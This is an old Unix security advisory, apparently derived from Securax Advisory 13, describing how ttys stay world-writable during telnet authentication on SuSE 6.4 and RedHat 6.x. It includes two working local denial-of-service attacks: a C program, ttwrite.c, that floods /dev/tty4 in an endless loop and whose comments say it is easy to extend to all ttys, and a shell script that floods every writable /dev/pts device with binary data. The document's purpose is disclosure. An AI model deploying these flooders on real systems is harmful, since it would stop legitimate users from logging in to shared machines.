COMMAND
tty
SYSTEMS AFFECTED
SuSE linux 6.4, RedHat 6.x
PROBLEM
Following is based on a Securax Advisory 13. When someone telnets
to a UNIX system, the tty that will be assigned to him will be
writable for any user on the system. However, when he is logged
in, his tty will not be writable for all users. So if someone
would write data to a tty that is currently used by someone who's
logging in, that person won't be able to log in.
The impact can be pretty severe, allowing no one to log in. The
proof of concept code created will demonstrate this, but only on
1 given tty. This was done for 2 basic reasons; 1 so the kiddies
can't play to much with this code and seconde that this was
written in less than 5 minutes (there was a lack of time).
/*
* ttwrite.c
* ---------
*
* written by ROOT-dude
*
* ok, this code is pretty shitty, but it works
* so far it's only set to flood tty4, but with a
* little modification, you can flood all tty's.
* I made this limitation so the kiddies can't
* play to much !!! (THIS IS ONLY PROOF OF
* CONCEPT CODE !!!!)
*
* I found this bug when I was messing around
* with this tool I found, called m0000h.sh
* which did the same but for /dev/pts,
* (that still isn't fixed btw) only "prob" is
* pts is for pseudo terminals, so a normal
* remote telnet connection will get a tty assinged
* and not a pts !!!!
*
* greetZ to :: incubus, f0bic, F_F, nostalgic,
* t-omicron, zym0t1c, tosh, vorlon, cicero,
* zoa, demongirl, so many others i forgot ...
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define string "aaaaaaaaaa"
main()
{
int fd;
char tty[25];
bzero(tty, sizeof(tty));
strcat(tty, "/dev/tty4"); /* change to tty you want */
fd = open(tty, O_WRONLY);
while(fd < 0)
{
fd = open(tty, O_WRONLY);
}
while(fd)
{
write(fd, string, sizeof(string));
}
close(fd); /* no need to close it, but we'll code it anyway !*/
}
teleh0r wrote a shell script which would flood the terminal of a
user trying to log in a long time ago and someone called
c0sa_n0stra. After that, this code was called m000h.sh.
The problem is the way that the telnet daemon assigns a new user
a terminal - when a user is telling the telnetd who he is, and
what his password is, his terminal will be awaiting in /dev/pts/
and writable by anyone. As soon as he has logged in, it will not.
It is still possible for him to log in though, even if a binary is
cat'ed to the terminal (but as said by Fyodor, it may mess-up
his terminal).
sshd/rshd/rlogind do not behave this way - there will be no
writable terminal in /dev/pts/ while the authentication is taking
place.
The below script has been tested on Redhat 6.1 and 6.2.
#!/bin/sh
TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY
while :; do
for i in $TTYDIR/* ; do
if [ -w $i -a -c $i -a $i != $MYTTY ]; then
cat $NONSENSE > $i
fi
done
done
unset i
SOLUTION
At least AIX 4.3.3 seems to set the /dev/pts/? to:
c--------- 1 root system 28, 3 Jan 03 23:06 3
during telnet auth.